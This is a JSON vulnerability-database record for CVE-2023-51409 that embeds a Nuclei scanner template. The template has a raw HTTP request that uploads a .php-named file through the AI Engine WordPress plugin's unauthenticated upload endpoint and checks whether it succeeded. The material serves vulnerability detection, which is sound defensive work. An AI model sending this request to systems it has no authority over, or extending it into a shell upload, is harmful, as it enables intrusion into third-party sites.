{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-51409/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-51409/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-51409/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-51409/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-51409/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-51409"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-51409"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-51409.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-51409\n\ninfo:\n  name: Jordy Meow AI Engine - Unrestricted File Upload\n  author: pussycat0x\n  severity: critical\n  description: |\n    Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine- ChatGPT Chatbot.This issue affects AI Engine- ChatGPT Chatbot- from n/a through 1.9.98.\n  impact: |\n    Unauthenticated attackers can upload files of dangerous types without restriction, potentially leading to remote code execution and complete system compromise.\n  remediation: |\n    Update AI Engine plugin to version 1.9.99 or later.\n  reference:\n    - https://github.com/Nxploited/CVE-2023-51409\n    - https://github.com/RandomRobbieBF/CVE-2023-51409\n    - https://patchstack.com/database/vulnerability/ai-engine/wordpress-ai-engine-plugin-1-9-98-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-51409\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-51409\n    cwe-id: CWE-434\n    epss-score: 0.63077\n    epss-percentile: 0.99177\n    cpe: cpe:2.3:a:meowapps:ai_engine:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: meowapps\n    product: ai_engine\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/ai-engine/\"\n  tags: cve,cve2023,wp,wordpress,wp-plugin,ai-engine,intrusive,vkev,vuln,ai\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(7))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate, br\n        Content-Type: multipart/form-data; boundary=7b22c609c9ce879dadf1494f0a6b2071\n\n        --7b22c609c9ce879dadf1494f0a6b2071\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\n        Content-Type: text/plain\n\n        {{randstr}}.txt\n        --7b22c609c9ce879dadf1494f0a6b2071--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - '{{filename}}.php'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c7e964f14c43db1e64b6f725c6bfacc13d6956cbbd245f19344b4915f9b69c1502206d8515fbb3300f9e0261dd3dba906917551f9f0f1fe31af5b01c93f8b43a85ac:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-51409"
}